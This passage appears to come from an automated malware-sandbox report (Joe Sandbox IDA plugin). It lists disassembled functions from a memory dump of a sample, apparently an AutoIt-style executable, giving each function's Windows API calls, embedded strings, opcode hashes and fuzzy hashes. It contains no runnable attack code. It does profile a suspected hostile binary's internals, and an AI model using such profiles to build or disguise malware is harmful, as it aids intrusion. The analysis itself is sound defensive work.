                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00EF5382
                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00EF538D
                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00EF5398
                                        • LoadCursorW.USER32(00000000,00007F04), ref: 00EF53A3
                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00EF53AE
                                        • GetCursorInfo.USER32(?), ref: 00EF53BE
                                        • GetLastError.KERNEL32(00000001,00000000), ref: 00EF53E9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Cursor$Load$ErrorInfoLast
                                        • String ID:
                                        • API String ID: 3215588206-0
                                        • Opcode ID: cc0509aa37f15fda3d761bc3a9811982b1112b17ed42018c610b58770d175009
                                        • Instruction ID: 6005bdd4da8ca8ac5bc1ae0995f17a4f1d651a93e058ad20e7249da3e5092423
                                        • Opcode Fuzzy Hash: cc0509aa37f15fda3d761bc3a9811982b1112b17ed42018c610b58770d175009
                                        • Instruction Fuzzy Hash: 5B418470E043196ADB109FBA8C4986FFFF8EF51B10B10452FE619E7291DAB8A401CE91
                                        Function 00EDAA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000100), ref: 00EDAAA5
                                        • __swprintf.LIBCMT ref: 00EDAB46
                                        • _wcscmp.LIBCMT ref: 00EDAB59
                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00EDABAE
                                        • _wcscmp.LIBCMT ref: 00EDABEA
                                        • GetClassNameW.USER32(?,?,00000400), ref: 00EDAC21
                                        • GetDlgCtrlID.USER32(?), ref: 00EDAC73
                                        • GetWindowRect.USER32(?,?), ref: 00EDACA9
                                        • GetParent.USER32(?), ref: 00EDACC7
                                        • ScreenToClient.USER32(00000000), ref: 00EDACCE
                                        • GetClassNameW.USER32(?,?,00000100), ref: 00EDAD48
                                        • _wcscmp.LIBCMT ref: 00EDAD5C
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00EDAD82
                                        • _wcscmp.LIBCMT ref: 00EDAD96
                                          • Part of subcall function 00EA386C: _iswctype.LIBCMT ref: 00EA3874
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                        • String ID: %s%u
                                        • API String ID: 3744389584-679674701
                                        • Opcode ID: 344dfd612e22005c06ea2f26b8a787cdddcb261dd18429f27072459a745b9839
                                        • Instruction ID: c37684a7228acb7e12b84fab2865951556d80272819cf3b007bdb0a513febb96
                                        • Opcode Fuzzy Hash: 344dfd612e22005c06ea2f26b8a787cdddcb261dd18429f27072459a745b9839
                                        • Instruction Fuzzy Hash: D4A1C771204706AFD714DF24C884BAAF7E9FF04319F14563AF999E2690D730EA46CB92
                                        Function 00EDB397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 00EDB3DB
                                        • _wcscmp.LIBCMT ref: 00EDB3EC
                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 00EDB414
                                        • CharUpperBuffW.USER32(?,00000000), ref: 00EDB431
                                        • _wcscmp.LIBCMT ref: 00EDB44F
                                        • _wcsstr.LIBCMT ref: 00EDB460
                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00EDB498
                                        • _wcscmp.LIBCMT ref: 00EDB4A8
                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 00EDB4CF
                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00EDB518
                                        • _wcscmp.LIBCMT ref: 00EDB528
                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 00EDB550
                                        • GetWindowRect.USER32(00000004,?), ref: 00EDB5B9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                        • String ID: @$ThumbnailClass
                                        • API String ID: 1788623398-1539354611
                                        • Opcode ID: 97e9ca91c7aac3b97185e5f9a5abc793d3e73475128dfc31f6771b6b762faa18
                                        • Instruction ID: 1b8de81ea86ec591ced5250f36d63bddf1350f03728a51a4034ef383cefbd90f
                                        • Opcode Fuzzy Hash: 97e9ca91c7aac3b97185e5f9a5abc793d3e73475128dfc31f6771b6b762faa18
                                        • Instruction Fuzzy Hash: D581B471004305DBDB14DF10D885FAA77E8FF44718F04A56AFD99AA292EB30ED4ACB61
                                        Function 00EDB1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: __wcsnicmp
                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                        • API String ID: 1038674560-1810252412
                                        • Opcode ID: a03f1e8cd3f41d2251484f12c933defbfd1ae84a69c954d1715dca08d5eb3174
                                        • Instruction ID: 78239584fed8d34b7307a50510fbb3944f0a21ea641191aa128e6ff0905c8f8c
                                        • Opcode Fuzzy Hash: a03f1e8cd3f41d2251484f12c933defbfd1ae84a69c954d1715dca08d5eb3174
                                        • Instruction Fuzzy Hash: 2E31A332948205E6DB14FA60CD83EEE77E4DF25760F61202AB449711E1FFE1EE05D652
                                        Function 00EDC4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadIconW.USER32(00000063), ref: 00EDC4D4
                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00EDC4E6
                                        • SetWindowTextW.USER32(?,?), ref: 00EDC4FD
                                        • GetDlgItem.USER32(?,000003EA), ref: 00EDC512
                                        • SetWindowTextW.USER32(00000000,?), ref: 00EDC518
                                        • GetDlgItem.USER32(?,000003E9), ref: 00EDC528
                                        • SetWindowTextW.USER32(00000000,?), ref: 00EDC52E
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00EDC54F
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00EDC569
                                        • GetWindowRect.USER32(?,?), ref: 00EDC572
                                        • SetWindowTextW.USER32(?,?), ref: 00EDC5DD
                                        • GetDesktopWindow.USER32 ref: 00EDC5E3
                                        • GetWindowRect.USER32(00000000), ref: 00EDC5EA
                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00EDC636
                                        • GetClientRect.USER32(?,?), ref: 00EDC643
                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00EDC668
                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00EDC693
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                        • String ID:
                                        • API String ID: 3869813825-0
                                        • Opcode ID: 8cfe351151e704f31a646ebefda238dfecce87fc8eff103dd0f8d303d3905791
                                        • Instruction ID: 48f46d556188a2b51357f8cd7482f06f4a2cbe1f249dbcad4aeb7cf4c79fff1e
                                        • Opcode Fuzzy Hash: 8cfe351151e704f31a646ebefda238dfecce87fc8eff103dd0f8d303d3905791
                                        • Instruction Fuzzy Hash: 04518E3090070AAFDB20DFA8DD85B6EBBF5FF04745F104929E686A26A0C775F945DB40
                                        Function 00F0A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 00F0A4C8
                                        • DestroyWindow.USER32(?,?), ref: 00F0A542
                                          • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F0A5BC
                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F0A5DE
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F0A5F1
                                        • DestroyWindow.USER32(00000000), ref: 00F0A613
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E80000,00000000), ref: 00F0A64A
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F0A663
                                        • GetDesktopWindow.USER32 ref: 00F0A67C
                                        • GetWindowRect.USER32(00000000), ref: 00F0A683
                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F0A69B
                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F0A6B3
                                          • Part of subcall function 00E825DB: GetWindowLongW.USER32(?,000000EB), ref: 00E825EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                        • String ID: 0$tooltips_class32
                                        • API String ID: 1297703922-3619404913
                                        • Opcode ID: ee8c2bea68d263191d141cc1500ccf16ce99252c559f6f1757ba8d61f9ecf46e
                                        • Instruction ID: b4c59319abf7c3e8fc0ded06793965157fa586900484f4bc7a6aded21fee3d66
                                        • Opcode Fuzzy Hash: ee8c2bea68d263191d141cc1500ccf16ce99252c559f6f1757ba8d61f9ecf46e
                                        • Instruction Fuzzy Hash: AC717471550309AFD720CF28CC49F6A7BE6FB89314F080528F985972A1CB72E946EB12
                                        Function 00F04619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 00F046AB
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F046F6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: BuffCharMessageSendUpper
                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                        • API String ID: 3974292440-4258414348
                                        • Opcode ID: 2998cac0018df60caaa3b9e85c6b894a5d28c0e4dc5758fc774ebbd555db0dc9
                                        • Instruction ID: b6e21e36067b3aec342fead48486898c200eee836e418529acef6f5f2c35f5ca
                                        • Opcode Fuzzy Hash: 2998cac0018df60caaa3b9e85c6b894a5d28c0e4dc5758fc774ebbd555db0dc9
                                        • Instruction Fuzzy Hash: 5C9161B56043019FCB14EF10C491A69B7E1AF89314F04986DF99A6B3A3DB31FD46EB41
                                        Function 00F0BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F0BB6E
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00F06D80,?), ref: 00F0BBCA
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F0BC03
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00F0BC46
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F0BC7D
                                        • FreeLibrary.KERNEL32(?), ref: 00F0BC89
                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F0BC99
                                        • DestroyCursor.USER32(?), ref: 00F0BCA8
                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F0BCC5
                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F0BCD1
                                          • Part of subcall function 00EA313D: __wcsicmp_l.LIBCMT ref: 00EA31C6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                        • String ID: .dll$.exe$.icl
                                        • API String ID: 3907162815-1154884017
                                        • Opcode ID: da44301b13f419730a5b517d9db266d62fcad3e164f98ed7ff53d3b50b37eef0
                                        • Instruction ID: 470cf14c45b2776922dc8c4f0a4ad479bd05a9f8ef026a31d887ad91d86240e6
                                        • Opcode Fuzzy Hash: da44301b13f419730a5b517d9db266d62fcad3e164f98ed7ff53d3b50b37eef0
                                        • Instruction Fuzzy Hash: 5161BFB1900219BBEB24DF64CC45FBE77A8FB08720F108519F915EA1D1DB74A994FBA0
                                        Function 00EEA5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                                          • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                                        • CharLowerBuffW.USER32(?,?), ref: 00EEA636
                                        • GetDriveTypeW.KERNEL32 ref: 00EEA683
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EEA6CB
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EEA702
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EEA730
                                          • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                        • API String ID: 2698844021-4113822522
                                        • Opcode ID: 6822239c8da67fe312dda8c53d71cdfff9cbd34c17eba035a723df88dd45521a
                                        • Instruction ID: af3912b8cbe97bdb137ef28a7b05a634c4c49ca18849fb85c64254290dc61095
                                        • Opcode Fuzzy Hash: 6822239c8da67fe312dda8c53d71cdfff9cbd34c17eba035a723df88dd45521a
                                        • Instruction Fuzzy Hash: DA514B711047099FC704EF21C88186AB7F4FF98718F18596DF89A672A1DB31EE0ACB52
                                        Function 00EEA45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EEA47A
                                        • __swprintf.LIBCMT ref: 00EEA49C
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00EEA4D9
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00EEA4FE
                                        • _memset.LIBCMT ref: 00EEA51D
                                        • _wcsncpy.LIBCMT ref: 00EEA559
                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00EEA58E
                                        • CloseHandle.KERNEL32(00000000), ref: 00EEA599
                                        • RemoveDirectoryW.KERNEL32(?), ref: 00EEA5A2
                                        • CloseHandle.KERNEL32(00000000), ref: 00EEA5AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                        • String ID: :$\$\??\%s
                                        • API String ID: 2733774712-3457252023
                                        • Opcode ID: 4258469a1cd6249fd081143ad10730f3085f1c7f57b08c171ac19e508952ff5f
                                        • Instruction ID: ab7e82c615cf0ae137c06ad25dab49f0331391736e5b5a353c43ca53c7a03304
                                        • Opcode Fuzzy Hash: 4258469a1cd6249fd081143ad10730f3085f1c7f57b08c171ac19e508952ff5f
                                        • Instruction Fuzzy Hash: D131B37150024DABDB21DFA1DC49FEB77BCEF89705F1450BAF508E6160E770A6488B25
                                        Function 00EBAB1B Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                        • String ID:
                                        • API String ID: 884005220-0
                                        • Opcode ID: 222b5b1454156853df318cf23656427864a1128579740431e596dce165353808
                                        • Instruction ID: 53220f5e8d9411c4d37064f43eaf0483f54e2aa8d67c3b1b8e7644787fa04452
                                        • Opcode Fuzzy Hash: 222b5b1454156853df318cf23656427864a1128579740431e596dce165353808
                                        • Instruction Fuzzy Hash: C261F872500205AFDF119F24D881BEB7BE5EF16329F187179E811BB191DB35E940CB92
                                        Function 00EEDB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                        Download Yara Rule
                                        APIs
                                        • __wsplitpath.LIBCMT ref: 00EEDC7B
                                        • _wcscat.LIBCMT ref: 00EEDC93
                                        • _wcscat.LIBCMT ref: 00EEDCA5
                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EEDCBA
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EEDCCE
                                        • GetFileAttributesW.KERNEL32(?), ref: 00EEDCE6
                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00EEDD00
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EEDD12
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                        • String ID: *.*
                                        • API String ID: 34673085-438819550
                                        • Opcode ID: a4570d03a6d87a801c422092bef8474b6b52cf534ff141063dae62605cc2fee2
                                        • Instruction ID: 932f0c4547cb3d3698ef5e7a813599496c22a1bafa2783317a7b0fa445ed931e
                                        • Opcode Fuzzy Hash: a4570d03a6d87a801c422092bef8474b6b52cf534ff141063dae62605cc2fee2
                                        • Instruction Fuzzy Hash: 0781A5715082899FC724EF25CC459AEB7E8BF88354F19982EF889E7251E730DD44CB52
